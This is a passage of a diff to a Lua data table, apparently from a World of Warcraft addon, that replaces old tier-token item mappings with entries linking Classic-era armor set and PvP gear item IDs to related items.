Wristguards + -- Shadowcraft Spaulders + ["226706"] = { + 16708, -- Shadowcraft Spaulders }, - -- Time Lord's Gloves - ["76212"] = { - 78173, -- Gauntlets of the Corrupted Vanquisher + -- Shadowcraft Cap + ["226707"] = { + 16707, -- Shadowcraft Cap }, - -- Time Lord's Hood - ["76213"] = { - 78172, -- Crown of the Corrupted Vanquisher + -- Wildheart Cowl + ["226708"] = { + 16720, -- Wildheart Cowl }, - -- Time Lord's Leggings - ["76214"] = { - 78171, -- Leggings of the Corrupted Vanquisher + -- Wildheart Kilt + ["226709"] = { + 16719, -- Wildheart Kilt }, - -- Time Lord's Robes - ["76215"] = { - 78174, -- Chest of the Corrupted Vanquisher + -- Wildheart Spaulders + ["226710"] = { + 16718, -- Wildheart Spaulders }, - -- Time Lord's Mantle - ["76216"] = { - 78170, -- Shoulders of the Corrupted Vanquisher + -- Wildheart Gloves + ["226711"] = { + 16717, -- Wildheart Gloves }, - -- Mantle of the Faceless Shroud - ["76339"] = { - 78180, -- Shoulders of the Corrupted Conqueror + -- Wildheart Belt + ["226712"] = { + 16716, -- Wildheart Belt }, - -- Robes of the Faceless Shroud - ["76340"] = { - 78184, -- Chest of the Corrupted Conqueror + -- Wildheart Boots + ["226713"] = { + 16715, -- Wildheart Boots }, - -- Leggings of the Faceless Shroud - ["76341"] = { - 78181, -- Leggings of the Corrupted Conqueror + -- Wildheart Bracers + ["226714"] = { + 16714, -- Wildheart Bracers }, - -- Hood of the Faceless Shroud - ["76342"] = { - 78182, -- Crown of the Corrupted Conqueror + -- Wildheart Vest + ["226715"] = { + 16706, -- Wildheart Vest }, - -- Gloves of the Faceless Shroud - ["76343"] = { - 78183, -- Gauntlets of the Corrupted Conqueror + -- Beaststalker's Mantle + ["226716"] = { + 16679, -- Beaststalker's Mantle }, - -- Mantle of Dying Light - ["76344"] = { - 78180, -- Shoulders of the Corrupted Conqueror + -- Beaststalker's Bindings + ["226717"] = { + 16681, -- Beaststalker's Bindings }, - -- Robes of Dying Light - ["76345"] = { - 78184, -- Chest of the Corrupted Conqueror + -- Beaststalker's Belt + ["226718"] = { + 16680, -- Beaststalker's Belt }, - -- Leggings of Dying Light - ["76346"] = { - 78181, -- Leggings of the Corrupted Conqueror + -- Beaststalker's Pants + ["226719"] = { + 16678, -- Beaststalker's Pants }, - -- Hood of Dying Light - ["76347"] = { - 78182, -- Crown of the Corrupted Conqueror + -- Beaststalker's Cap + ["226720"] = { + 16677, -- Beaststalker's Cap }, - -- Gloves of Dying Light - ["76348"] = { - 78183, -- Gauntlets of the Corrupted Conqueror + -- Beaststalker's Gloves + ["226721"] = { + 16676, -- Beaststalker's Gloves }, - -- Handwraps of Dying Light - ["76357"] = { - 78183, -- Gauntlets of the Corrupted Conqueror + -- Beaststalker's Boots + ["226722"] = { + 16675, -- Beaststalker's Boots }, - -- Cowl of Dying Light - ["76358"] = { - 78182, -- Crown of the Corrupted Conqueror + -- Beaststalker's Tunic + ["226723"] = { + 16674, -- Beaststalker's Tunic }, - -- Legwraps of Dying Light - ["76359"] = { - 78181, -- Leggings of the Corrupted Conqueror + -- Magister's Belt + ["226724"] = { + 16685, -- Magister's Belt }, - -- Robes of Dying Light - ["76360"] = { - 78184, -- Chest of the Corrupted Conqueror + -- Magister's Bindings + ["226725"] = { + 16683, -- Magister's Bindings }, - -- Mantle of Dying Light - ["76361"] = { - 78180, -- Shoulders of the Corrupted Conqueror + -- Magister's Mantle + ["226726"] = { + 16689, -- Magister's Mantle }, - -- Deep Earth Handwraps - ["76749"] = { - 78173, -- Gauntlets of the Corrupted Vanquisher + -- Magister's Leggings + ["226727"] = { + 16687, -- Magister's Leggings }, - -- Deep Earth Helm - ["76750"] = { - 78172, -- Crown of the Corrupted Vanquisher + -- Magister's Crown + ["226728"] = { + 16686, -- Magister's Crown }, - -- Deep Earth Legwraps - ["76751"] = { - 78171, -- Leggings of the Corrupted Vanquisher + -- Magister's Robes + ["226729"] = { + 16688, -- Magister's Robes }, - -- Deep Earth Robes - ["76752"] = { - 78174, -- Chest of the Corrupted Vanquisher + -- Magister's Boots + ["226730"] = { + 16682, -- Magister's Boots }, - -- Deep Earth Mantle - ["76753"] = { - 78170, -- Shoulders of the Corrupted Vanquisher + -- Magister's Gloves + ["226731"] = { + 16684, -- Magister's Gloves + }, + -- Lightforge Belt + ["226732"] = { + 16723, -- Lightforge Belt + }, + -- Lightforge Helm + ["226733"] = { + 16727, -- Lightforge Helm + }, + -- Lightforge Breastplate + ["226734"] = { + 16726, -- Lightforge Breastplate }, - -- Spiritwalker's Tunic - ["76756"] = { - 78179, -- Chest of the Corrupted Protector + -- Lightforge Spaulders + ["226735"] = { + 16729, -- Lightforge Spaulders }, - -- Spiritwalker's Handwraps - ["76757"] = { - 78178, -- Gauntlets of the Corrupted Protector + -- Lightforge Legplates + ["226736"] = { + 16728, -- Lightforge Legplates }, - -- Spiritwalker's Faceguard - ["76758"] = { - 78177, -- Crown of the Corrupted Protector + -- Lightforge Gauntlets + ["226737"] = { + 16724, -- Lightforge Gauntlets }, - -- Spiritwalker's Legwraps - ["76759"] = { - 78176, -- Leggings of the Corrupted Protector + -- Lightforge Boots + ["226738"] = { + 16725, -- Lightforge Boots }, - -- Spiritwalker's Mantle - ["76760"] = { - 78175, -- Shoulders of the Corrupted Protector + -- Lightforge Bracers + ["226739"] = { + 16722, -- Lightforge Bracers }, - -- Breastplate of Radiant Glory - ["76765"] = { - 78184, -- Chest of the Corrupted Conqueror + -- Devout Gloves + ["226740"] = { + 16692, -- Devout Gloves }, - -- Gloves of Radiant Glory - ["76766"] = { - 78183, -- Gauntlets of the Corrupted Conqueror + -- Devout Mantle + ["226741"] = { + 16695, -- Devout Mantle }, - -- Headguard of Radiant Glory - ["76767"] = { - 78182, -- Crown of the Corrupted Conqueror + -- Devout Bracers + ["226742"] = { + 16697, -- Devout Bracers }, - -- Greaves of Radiant Glory - ["76768"] = { - 78181, -- Leggings of the Corrupted Conqueror + -- Devout Sandals + ["226743"] = { + 16691, -- Devout Sandals }, - -- Mantle of Radiant Glory - ["76769"] = { - 78180, -- Shoulders of the Corrupted Conqueror + -- Devout Belt + ["226744"] = { + 16696, -- Devout Belt }, - -- Battleplate of Radiant Glory - ["76874"] = { - 78184, -- Chest of the Corrupted Conqueror + -- Devout Robe + ["226745"] = { + 16690, -- Devout Robe }, - -- Gauntlets of Radiant Glory - ["76875"] = { - 78183, -- Gauntlets of the Corrupted Conqueror + -- Devout Crown + ["226746"] = { + 16693, -- Devout Crown }, - -- Helmet of Radiant Glory - ["76876"] = { - 78182, -- Crown of the Corrupted Conqueror + -- Devout Skirt + ["226747"] = { + 16694, -- Devout Skirt }, - -- Legplates of Radiant Glory - ["76877"] = { - 78181, -- Leggings of the Corrupted Conqueror + -- Gauntlets of Elements + ["226748"] = { + 16672, -- Gauntlets of Elements }, - -- Pauldrons of Radiant Glory - ["76878"] = { - 78180, -- Shoulders of the Corrupted Conqueror + -- Vest of Elements + ["226749"] = { + 16666, -- Vest of Elements }, - -- Necrotic Boneplate Breastplate - ["76974"] = { - 78174, -- Chest of the Corrupted Vanquisher + -- Kilt of Elements + ["226750"] = { + 16668, -- Kilt of Elements }, - -- Necrotic Boneplate Gauntlets - ["76975"] = { - 78173, -- Gauntlets of the Corrupted Vanquisher + -- Bindings of Elements + ["226751"] = { + 16671, -- Bindings of Elements }, - -- Necrotic Boneplate Helmet - ["76976"] = { - 78172, -- Crown of the Corrupted Vanquisher + -- Boots of Elements + ["226752"] = { + 16670, -- Boots of Elements }, - -- Necrotic Boneplate Greaves - ["76977"] = { - 78171, -- Leggings of the Corrupted Vanquisher + -- Pauldrons of Elements + ["226753"] = { + 16669, -- Pauldrons of Elements }, - -- Necrotic Boneplate Pauldrons - ["76978"] = { - 78170, -- Shoulders of the Corrupted Vanquisher + -- Cord of Elements + ["226754"] = { + 16673, -- Cord of Elements }, - -- Colossal Dragonplate Helmet - ["76983"] = { - 78177, -- Crown of the Corrupted Protector + -- Coif of Elements + ["226755"] = { + 16667, -- Coif of Elements }, - -- Colossal Dragonplate Battleplate - ["76984"] = { - 78179, -- Chest of the Corrupted Protector + -- Dreadmist Mantle + ["226756"] = { + 16701, -- Dreadmist Mantle }, - -- Colossal Dragonplate Gauntlets - ["76985"] = { - 78178, -- Gauntlets of the Corrupted Protector + -- Dreadmist Robe + ["226757"] = { + 16700, -- Dreadmist Robe }, - -- Colossal Dragonplate Legplates - ["76986"] = { - 78176, -- Leggings of the Corrupted Protector + -- Dreadmist Wraps + ["226758"] = { + 16705, -- Dreadmist Wraps }, - -- Colossal Dragonplate Pauldrons - ["76987"] = { - 78175, -- Shoulders of the Corrupted Protector + -- Dreadmist Bracers + ["226759"] = { + 16703, -- Dreadmist Bracers }, - -- Colossal Dragonplate Chestguard - ["76988"] = { - 78179, -- Chest of the Corrupted Protector + -- Dreadmist Leggings + ["226760"] = { + 16699, -- Dreadmist Leggings }, - -- Colossal Dragonplate Handguards - ["76989"] = { - 78178, -- Gauntlets of the Corrupted Protector + -- Dreadmist Belt + ["226761"] = { + 16702, -- Dreadmist Belt }, - -- Colossal Dragonplate Faceguard - ["76990"] = { - 78177, -- Crown of the Corrupted Protector + -- Dreadmist Mask + ["226762"] = { + 16698, -- Dreadmist Mask }, - -- Colossal Dragonplate Legguards - ["76991"] = { - 78176, -- Leggings of the Corrupted Protector + -- Dreadmist Sandals + ["226763"] = { + 16704, -- Dreadmist Sandals }, - -- Colossal Dragonplate Shoulderguards - ["76992"] = { - 78175, -- Shoulders of the Corrupted Protector + -- Boots of Valor + ["226764"] = { + 16734, -- Boots of Valor }, - -- Chestguard of Radiant Glory - ["77003"] = { - 78184, -- Chest of the Corrupted Conqueror + -- Belt of Valor + ["226765"] = { + 16736, -- Belt of Valor }, - -- Handguards of Radiant Glory - ["77004"] = { - 78183, -- Gauntlets of the Corrupted Conqueror + -- Bracers of Valor + ["226766"] = { + 16735, -- Bracers of Valor }, - -- Faceguard of Radiant Glory - ["77005"] = { - 78182, -- Crown of the Corrupted Conqueror + -- Legplates of Valor + ["226767"] = { + 16732, -- Legplates of Valor }, - -- Legguards of Radiant Glory - ["77006"] = { - 78181, -- Leggings of the Corrupted Conqueror + -- Spaulders of Valor + ["226768"] = { + 16733, -- Spaulders of Valor }, - -- Shoulderguards of Radiant Glory - ["77007"] = { - 78180, -- Shoulders of the Corrupted Conqueror + -- Helm of Valor + ["226769"] = { + 16731, -- Helm of Valor }, - -- Necrotic Boneplate Chestguard - ["77008"] = { - 78174, -- Chest of the Corrupted Vanquisher + -- Breastplate of Valor + ["226770"] = { + 16730, -- Breastplate of Valor }, - -- Necrotic Boneplate Handguards - ["77009"] = { - 78173, -- Gauntlets of the Corrupted Vanquisher + -- Gauntlets of Valor + ["226771"] = { + 16737, -- Gauntlets of Valor }, - -- Necrotic Boneplate Faceguard - ["77010"] = { - 78172, -- Crown of the Corrupted Vanquisher + -- Feralheart Cowl + ["226773"] = { + 22109, -- Feralheart Cowl }, - -- Necrotic Boneplate Legguards - ["77011"] = { - 78171, -- Leggings of the Corrupted Vanquisher + -- Feralheart Vest + ["226776"] = { + 22113, -- Feralheart Vest }, - -- Necrotic Boneplate Shoulderguards - ["77012"] = { - 78170, -- Shoulders of the Corrupted Vanquisher + -- Feralheart Spaulders + ["226778"] = { + 22112, -- Feralheart Spaulders }, - -- Deep Earth Raiment - ["77013"] = { - 78174, -- Chest of the Corrupted Vanquisher + -- Feralheart Kilt + ["226779"] = { + 22111, -- Feralheart Kilt }, - -- Deep Earth Grips - ["77014"] = { - 78173, -- Gauntlets of the Corrupted Vanquisher + -- Feralheart Gloves + ["226820"] = { + 22110, -- Feralheart Gloves }, - -- Deep Earth Headpiece - ["77015"] = { - 78172, -- Crown of the Corrupted Vanquisher + -- Feralheart Boots + ["226821"] = { + 22107, -- Feralheart Boots }, - -- Deep Earth Legguards - ["77016"] = { - 78171, -- Leggings of the Corrupted Vanquisher + -- Darkmantle Tunic + ["226825"] = { + 22009, -- Darkmantle Tunic }, - -- Deep Earth Spaulders - ["77017"] = { - 78170, -- Shoulders of the Corrupted Vanquisher + -- Darkmantle Spaulders + ["226826"] = { + 22008, -- Darkmantle Spaulders }, - -- Deep Earth Gloves - ["77018"] = { - 78173, -- Gauntlets of the Corrupted Vanquisher + -- Darkmantle Pants + ["226827"] = { + 22007, -- Darkmantle Pants }, - -- Deep Earth Cover - ["77019"] = { - 78172, -- Crown of the Corrupted Vanquisher + -- Darkmantle Cap + ["226829"] = { + 22005, -- Darkmantle Cap }, - -- Deep Earth Leggings - ["77020"] = { - 78171, -- Leggings of the Corrupted Vanquisher + -- Darkmantle Bracers + ["226830"] = { + 22004, -- Darkmantle Bracers }, - -- Deep Earth Vestment - ["77021"] = { - 78174, -- Chest of the Corrupted Vanquisher + -- Darkmantle Belt + ["226832"] = { + 22002, -- Darkmantle Belt }, - -- Deep Earth Shoulderwraps - ["77022"] = { - 78170, -- Shoulders of the Corrupted Vanquisher + -- Darkmantle Gloves + ["226850"] = { + 22006, -- Darkmantle Gloves }, - -- Blackfang Battleweave Tunic - ["77023"] = { - 78174, -- Chest of the Corrupted Vanquisher + -- Darkmantle Boots + ["226851"] = { + 22003, -- Darkmantle Boots }, - -- Blackfang Battleweave Gloves - ["77024"] = { - 78173, -- Gauntlets of the Corrupted Vanquisher + -- Spaulders of Heroism + ["226858"] = { + 22001, -- Spaulders of Heroism }, - -- Blackfang Battleweave Helmet - ["77025"] = { - 78172, -- Crown of the Corrupted Vanquisher + -- Legplates of Heroism + ["226859"] = { + 22000, -- Legplates of Heroism }, - -- Blackfang Battleweave Legguards - ["77026"] = { - 78171, -- Leggings of the Corrupted Vanquisher + -- Gauntlets of Heroism + ["226861"] = { + 21998, -- Gauntlets of Heroism }, - -- Blackfang Battleweave Spaulders - ["77027"] = { - 78170, -- Shoulders of the Corrupted Vanquisher + -- Breastplate of Heroism + ["226862"] = { + 21997, -- Breastplate of Heroism }, - -- Wyrmstalker's Tunic - ["77028"] = { - 78179, -- Chest of the Corrupted Protector + -- Bracers of Heroism + ["226863"] = { + 21996, -- Bracers of Heroism }, - -- Wyrmstalker's Gloves - ["77029"] = { - 78178, -- Gauntlets of the Corrupted Protector + -- Belt of Heroism + ["226864"] = { + 21994, -- Belt of Heroism }, - -- Wyrmstalker's Headguard - ["77030"] = { - 78177, -- Crown of the Corrupted Protector + -- Helm of Heroism + ["226877"] = { + 21999, -- Helm of Heroism }, - -- Wyrmstalker's Legguards - ["77031"] = { - 78176, -- Leggings of the Corrupted Protector + -- Boots of Heroism + ["226879"] = { + 21995, -- Boots of Heroism }, - -- Wyrmstalker's Spaulders - ["77032"] = { - 78175, -- Shoulders of the Corrupted Protector + -- Beastmaster's Pants + ["226882"] = { + 22017, -- Beastmaster's Pants }, - -- Spiritwalker's Shoulderwraps - ["77035"] = { - 78175, -- Shoulders of the Corrupted Protector + -- Beastmaster's Mantle + ["226884"] = { + 22016, -- Beastmaster's Mantle }, - -- Spiritwalker's Kilt - ["77036"] = { - 78176, -- Leggings of the Corrupted Protector + -- Beastmaster's Bindings + ["226885"] = { + 22011, -- Beastmaster's Bindings }, - -- Spiritwalker's Headpiece - ["77037"] = { - 78177, -- Crown of the Corrupted Protector + -- Beastmaster's Tunic + ["226886"] = { + 22060, -- Beastmaster's Tunic }, - -- Spiritwalker's Gloves - ["77038"] = { - 78178, -- Gauntlets of the Corrupted Protector + -- Beastmaster's Cap + ["226887"] = { + 22013, -- Beastmaster's Cap }, - -- Spiritwalker's Hauberk - ["77039"] = { - 78179, -- Chest of the Corrupted Protector + -- Beastmaster's Belt + ["226888"] = { + 22010, -- Beastmaster's Belt }, - -- Spiritwalker's Cuirass - ["77040"] = { - 78179, -- Chest of the Corrupted Protector + -- Beastmaster's Gloves + ["226902"] = { + 22015, -- Beastmaster's Gloves }, - -- Spiritwalker's Grips - ["77041"] = { - 78178, -- Gauntlets of the Corrupted Protector + -- Beastmaster's Boots + ["226903"] = { + 22061, -- Beastmaster's Boots }, - -- Spiritwalker's Helmet - ["77042"] = { - 78177, -- Crown of the Corrupted Protector + -- Deathmist Belt + ["226905"] = { + 22070, -- Deathmist Belt }, - -- Spiritwalker's Legguards - ["77043"] = { - 78176, -- Leggings of the Corrupted Protector + -- Deathmist Robe + ["226906"] = { + 22075, -- Deathmist Robe }, - -- Spiritwalker's Spaulders - ["77044"] = { - 78175, -- Shoulders of the Corrupted Protector + -- Deathmist Bracers + ["226907"] = { + 22071, -- Deathmist Bracers }, - -- Golad, Twilight of Aspects - ["77949"] = { - 77952, -- Elementium Gem Cluster + -- Deathmist Sandals + ["226908"] = { + 22076, -- Deathmist Sandals }, - -- Tiriosh, Nightmare of Ages - ["77950"] = { - 77952, -- Elementium Gem Cluster + -- Deathmist Mask + ["226909"] = { + 22074, -- Deathmist Mask }, - -- Elementium Gem Cluster - ["77952"] = { - 77949, -- Golad, Twilight of Aspects - 77950, -- Tiriosh, Nightmare of Ages + -- Deathmist Leggings + ["226910"] = { + 22072, -- Deathmist Leggings }, - -- Shoulders of the Corrupted Vanquisher - ["78170"] = { - 76216, -- Time Lord's Mantle - 76753, -- Deep Earth Mantle - 76978, -- Necrotic Boneplate Pauldrons - 77012, -- Necrotic Boneplate Shoulderguards - 77017, -- Deep Earth Spaulders - 77022, -- Deep Earth Shoulderwraps - 77027, -- Blackfang Battleweave Spaulders + -- Deathmist Wraps + ["226911"] = { + 22077, -- Deathmist Wraps }, - -- Leggings of the Corrupted Vanquisher - ["78171"] = { - 76214, -- Time Lord's Leggings - 76751, -- Deep Earth Legwraps - 76977, -- Necrotic Boneplate Greaves - 77011, -- Necrotic Boneplate Legguards - 77016, -- Deep Earth Legguards - 77020, -- Deep Earth Leggings - 77026, -- Blackfang Battleweave Legguards + -- Deathmist Mantle + ["226912"] = { + 22073, -- Deathmist Mantle }, - -- Crown of the Corrupted Vanquisher - ["78172"] = { - 76213, -- Time Lord's Hood - 76750, -- Deep Earth Helm - 76976, -- Necrotic Boneplate Helmet - 77010, -- Necrotic Boneplate Faceguard - 77015, -- Deep Earth Headpiece - 77019, -- Deep Earth Cover - 77025, -- Blackfang Battleweave Helmet + -- Sorcerer's Bindings + ["226929"] = { + 22063, -- Sorcerer's Bindings }, - -- Gauntlets of the Corrupted Vanquisher - ["78173"] = { - 76212, -- Time Lord's Gloves - 76749, -- Deep Earth Handwraps - 76975, -- Necrotic Boneplate Gauntlets - 77009, -- Necrotic Boneplate Handguards - 77014, -- Deep Earth Grips - 77018, -- Deep Earth Gloves - 77024, -- Blackfang Battleweave Gloves + -- Sorcerer's Robes + ["226932"] = { + 22069, -- Sorcerer's Robes }, - -- Chest of the Corrupted Vanquisher - ["78174"] = { - 76215, -- Time Lord's Robes - 76752, -- Deep Earth Robes - 76974, -- Necrotic Boneplate Breastplate - 77008, -- Necrotic Boneplate Chestguard - 77013, -- Deep Earth Raiment - 77021, -- Deep Earth Vestment - 77023, -- Blackfang Battleweave Tunic + -- Sorcerer's Leggings + ["226933"] = { + 22067, -- Sorcerer's Leggings }, - -- Shoulders of the Corrupted Protector - ["78175"] = { - 76760, -- Spiritwalker's Mantle - 76987, -- Colossal Dragonplate Pauldrons - 76992, -- Colossal Dragonplate Shoulderguards - 77032, -- Wyrmstalker's Spaulders - 77035, -- Spiritwalker's Shoulderwraps - 77044, -- Spiritwalker's Spaulders + -- Sorcerer's Belt + ["226934"] = { + 22062, -- Sorcerer's Belt }, - -- Leggings of the Corrupted Protector - ["78176"] = { - 76759, -- Spiritwalker's Legwraps - 76986, -- Colossal Dragonplate Legplates - 76991, -- Colossal Dragonplate Legguards - 77031, -- Wyrmstalker's Legguards - 77036, -- Spiritwalker's Kilt - 77043, -- Spiritwalker's Legguards + -- Sorcerer's Crown + ["226935"] = { + 22065, -- Sorcerer's Crown }, - -- Crown of the Corrupted Protector - ["78177"] = { - 76758, -- Spiritwalker's Faceguard - 76983, -- Colossal Dragonplate Helmet - 76990, -- Colossal Dragonplate Faceguard - 77030, -- Wyrmstalker's Headguard - 77037, -- Spiritwalker's Headpiece - 77042, -- Spiritwalker's Helmet + -- Sorcerer's Mantle + ["226936"] = { + 22068, -- Sorcerer's Mantle }, - -- Gauntlets of the Corrupted Protector - ["78178"] = { - 76757, -- Spiritwalker's Handwraps - 76985, -- Colossal Dragonplate Gauntlets - 76989, -- Colossal Dragonplate Handguards - 77029, -- Wyrmstalker's Gloves - 77038, -- Spiritwalker's Gloves - 77041, -- Spiritwalker's Grips + -- Sorcerer's Gloves + ["226942"] = { + 22066, -- Sorcerer's Gloves }, - -- Chest of the Corrupted Protector - ["78179"] = { - 76756, -- Spiritwalker's Tunic - 76984, -- Colossal Dragonplate Battleplate - 76988, -- Colossal Dragonplate Chestguard - 77028, -- Wyrmstalker's Tunic - 77039, -- Spiritwalker's Hauberk - 77040, -- Spiritwalker's Cuirass + -- Sorcerer's Boots + ["226943"] = { + 22064, -- Sorcerer's Boots }, - -- Shoulders of the Corrupted Conqueror - ["78180"] = { - 76339, -- Mantle of the Faceless Shroud - 76344, -- Mantle of Dying Light - 76361, -- Mantle of Dying Light - 76769, -- Mantle of Radiant Glory - 76878, -- Pauldrons of Radiant Glory - 77007, -- Shoulderguards of Radiant Glory + -- Virtuous Robe + ["226945"] = { + 22083, -- Virtuous Robe }, - -- Leggings of the Corrupted Conqueror - ["78181"] = { - 76341, -- Leggings of the Faceless Shroud - 76346, -- Leggings of Dying Light - 76359, -- Legwraps of Dying Light - 76768, -- Greaves of Radiant Glory - 76877, -- Legplates of Radiant Glory - 77006, -- Legguards of Radiant Glory + -- Virtuous Skirt + ["226946"] = { + 22085, -- Virtuous Skirt }, - -- Crown of the Corrupted Conqueror - ["78182"] = { - 76342, -- Hood of the Faceless Shroud - 76347, -- Hood of Dying Light - 76358, -- Cowl of Dying Light - 76767, -- Headguard of Radiant Glory - 76876, -- Helmet of Radiant Glory - 77005, -- Faceguard of Radiant Glory + -- Virtuous Crown + ["226947"] = { + 22080, -- Virtuous Crown }, - -- Gauntlets of the Corrupted Conqueror - ["78183"] = { - 76343, -- Gloves of the Faceless Shroud - 76348, -- Gloves of Dying Light - 76357, -- Handwraps of Dying Light - 76766, -- Gloves of Radiant Glory - 76875, -- Gauntlets of Radiant Glory - 77004, -- Handguards of Radiant Glory + -- Virtuous Belt + ["226948"] = { + 22078, -- Virtuous Belt }, - -- Chest of the Corrupted Conqueror - ["78184"] = { - 76340, -- Robes of the Faceless Shroud - 76345, -- Robes of Dying Light - 76360, -- Robes of Dying Light - 76765, -- Breastplate of Radiant Glory - 76874, -- Battleplate of Radiant Glory - 77003, -- Chestguard of Radiant Glory + -- Virtuous Bracers + ["226949"] = { + 22079, -- Virtuous Bracers }, - -- Colossal Dragonplate Battleplate - ["78657"] = { - 78848, -- Chest of the Corrupted Protector + -- Virtuous Mantle + ["226951"] = { + 22082, -- Virtuous Mantle }, - -- Colossal Dragonplate Chestguard - ["78658"] = { - 78848, -- Chest of the Corrupted Protector + -- Virtuous Sandals + ["226952"] = { + 22084, -- Virtuous Sandals }, - -- Necrotic Boneplate Breastplate - ["78659"] = { - 78849, -- Chest of the Corrupted Vanquisher + -- Virtuous Gloves + ["226966"] = { + 22081, -- Virtuous Gloves }, - -- Deep Earth Robes - ["78660"] = { - 78849, -- Chest of the Corrupted Vanquisher + -- Soulforge Spaulders + ["226969"] = { + 22093, -- Soulforge Spaulders }, - -- Wyrmstalker's Tunic - ["78661"] = { - 78848, -- Chest of the Corrupted Protector + -- Soulforge Bracers + ["226970"] = { + 22088, -- Soulforge Bracers }, - -- Deep Earth Vestment - ["78662"] = { - 78849, -- Chest of the Corrupted Vanquisher + -- Soulforge Belt + ["226971"] = { + 22086, -- Soulforge Belt }, - -- Necrotic Boneplate Chestguard - ["78663"] = { - 78849, -- Chest of the Corrupted Vanquisher + -- Soulforge Legplates + ["226972"] = { + 22092, -- Soulforge Legplates }, - -- Blackfang Battleweave Tunic - ["78664"] = { - 78849, -- Chest of the Corrupted Vanquisher + -- Soulforge Breastplate + ["226973"] = { + 22089, -- Soulforge Breastplate }, - -- Deep Earth Raiment - ["78665"] = { - 78849, -- Chest of the Corrupted Vanquisher + -- Soulforge Gauntlets + ["226975"] = { + 22090, -- Soulforge Gauntlets }, - -- Spiritwalker's Gloves - ["78666"] = { - 78854, -- Gauntlets of the Corrupted Protector + -- Soulforge Helm + ["226997"] = { + 22091, -- Soulforge Helm }, - -- Spiritwalker's Grips - ["78667"] = { - 78854, -- Gauntlets of the Corrupted Protector + -- Soulforge Boots + ["226999"] = { + 22087, -- Soulforge Boots }, - -- Colossal Dragonplate Gauntlets - ["78668"] = { - 78854, -- Gauntlets of the Corrupted Protector + -- Bindings of The Five Thunders + ["227001"] = { + 22095, -- Bindings of The Five Thunders }, - -- Colossal Dragonplate Handguards - ["78669"] = { - 78854, -- Gauntlets of the Corrupted Protector + -- Coif of The Five Thunders + ["227002"] = { + 22097, -- Coif of The Five Thunders }, - -- Necrotic Boneplate Gauntlets - ["78670"] = { - 78855, -- Gauntlets of the Corrupted Vanquisher + -- Pauldrons of The Five Thunders + ["227003"] = { + 22101, -- Pauldrons of The Five Thunders }, - -- Time Lord's Gloves - ["78671"] = { - 78855, -- Gauntlets of the Corrupted Vanquisher + -- Vest of The Five Thunders + ["227004"] = { + 22102, -- Vest of The Five Thunders }, - -- Spiritwalker's Handwraps - ["78672"] = { - 78854, -- Gauntlets of the Corrupted Protector + -- Kilt of The Five Thunders + ["227005"] = { + 22100, -- Kilt of The Five Thunders }, - -- Gloves of Radiant Glory - ["78673"] = { - 78853, -- Gauntlets of the Corrupted Conqueror + -- Gauntlets of The Five Thunders + ["227006"] = { + 22099, -- Gauntlets of The Five Thunders }, - -- Wyrmstalker's Gloves - ["78674"] = { - 78854, -- Gauntlets of the Corrupted Protector + -- Cord of The Five Thunders + ["227008"] = { + 22098, -- Cord of The Five Thunders }, - -- Gauntlets of Radiant Glory - ["78675"] = { - 78853, -- Gauntlets of the Corrupted Conqueror + -- Boots of The Five Thunders + ["227039"] = { + 22096, -- Boots of The Five Thunders }, - -- Deep Earth Gloves - ["78676"] = { - 78855, -- Gauntlets of the Corrupted Vanquisher + -- Champion's Plate Shoulders + ["227042"] = { + 23243, -- Champion's Plate Shoulders }, - -- Handguards of Radiant Glory - ["78677"] = { - 78853, -- Gauntlets of the Corrupted Conqueror + -- Champion's Plate Helm + ["227043"] = { + 23244, -- Champion's Plate Helm }, - -- Necrotic Boneplate Handguards - ["78678"] = { - 78855, -- Gauntlets of the Corrupted Vanquisher + -- Lieutenant Commander's Plate Helm + ["227044"] = { + 16429, -- Lieutenant Commander's Plate Helm + 23314, -- Lieutenant Commander's Plate Helm + }, + -- Lieutenant Commander's Plate Shoulders + ["227045"] = { + 23315, -- Lieutenant Commander's Plate Shoulders + }, + -- Knight-Captain's Plate Hauberk + ["227046"] = { + 23300, -- Knight-Captain's Plate Hauberk + }, + -- Knight-Captain's Plate Leggings + ["227047"] = { + 16431, -- Knight-Captain's Plate Leggings + 23301, -- Knight-Captain's Plate Leggings + }, + -- Legionnaire's Plate Leggings + ["227048"] = { + 22873, -- Legionnaire's Plate Leggings + }, + -- Legionnaire's Plate Hauberk + ["227049"] = { + 22872, -- Legionnaire's Plate Hauberk + }, + -- Blood Guard's Plate Gauntlets + ["227050"] = { + 22868, -- Blood Guard's Plate Gauntlets + }, + -- Blood Guard's Plate Greaves + ["227051"] = { + 22858, -- Blood Guard's Plate Greaves + }, + -- Knight-Lieutenant's Plate Greaves + ["227052"] = { + 23287, -- Knight-Lieutenant's Plate Greaves + }, + -- Knight-Lieutenant's Plate Gauntlets + ["227053"] = { + 16406, -- Knight-Lieutenant's Plate Gauntlets + 23286, -- Knight-Lieutenant's Plate Gauntlets + }, + -- Lieutenant Commander's Leather Shoulders + ["227054"] = { + 23313, -- Lieutenant Commander's Leather Shoulders + }, + -- Lieutenant Commander's Leather Helm + ["227055"] = { + 23312, -- Lieutenant Commander's Leather Helm + }, + -- Champion's Leather Shoulders + ["227056"] = { + 23258, -- Champion's Leather Shoulders + }, + -- Champion's Leather Helm + ["227057"] = { + 23257, -- Champion's Leather Helm + }, + -- Knight-Captain's Leather Chestpiece + ["227058"] = { + 23298, -- Knight-Captain's Leather Chestpiece + }, + -- Legionnaire's Leather Legguards + ["227059"] = { + 22880, -- Legionnaire's Leather Legguards + }, + -- Legionnaire's Leather Chestpiece + ["227060"] = { + 22879, -- Legionnaire's Leather Chestpiece + }, + -- Knight-Captain's Leather Legguards + ["227061"] = { + 16419, -- Knight-Captain's Leather Legguards + 23299, -- Knight-Captain's Leather Legguards + }, + -- Blood Guard's Leather Walkers + ["227062"] = { + 22856, -- Blood Guard's Leather Walkers + }, + -- Blood Guard's Leather Grips + ["227063"] = { + 22864, -- Blood Guard's Leather Grips + }, + -- Knight-Lieutenant's Leather Walkers + ["227064"] = { + 23285, -- Knight-Lieutenant's Leather Walkers + }, + -- Knight-Lieutenant's Leather Grips + ["227065"] = { + 23284, -- Knight-Lieutenant's Leather Grips + }, + -- Lieutenant Commander's Chain Helm + ["227066"] = { + 23306, -- Lieutenant Commander's Chain Helm + }, + -- Champion's Chain Helm + ["227067"] = { + 23251, -- Champion's Chain Helm + }, + -- Lieutenant Commander's Chain Shoulders + ["227068"] = { + 23307, -- Lieutenant Commander's Chain Shoulders + }, + -- Champion's Chain Shoulders + ["227069"] = { + 23252, -- Champion's Chain Shoulders + }, + -- Knight-Captain's Chain Hauberk + ["227070"] = { + 16425, -- Knight-Captain's Chain Hauberk + 23292, -- Knight-Captain's Chain Hauberk }, - -- Blackfang Battleweave Gloves - ["78679"] = { 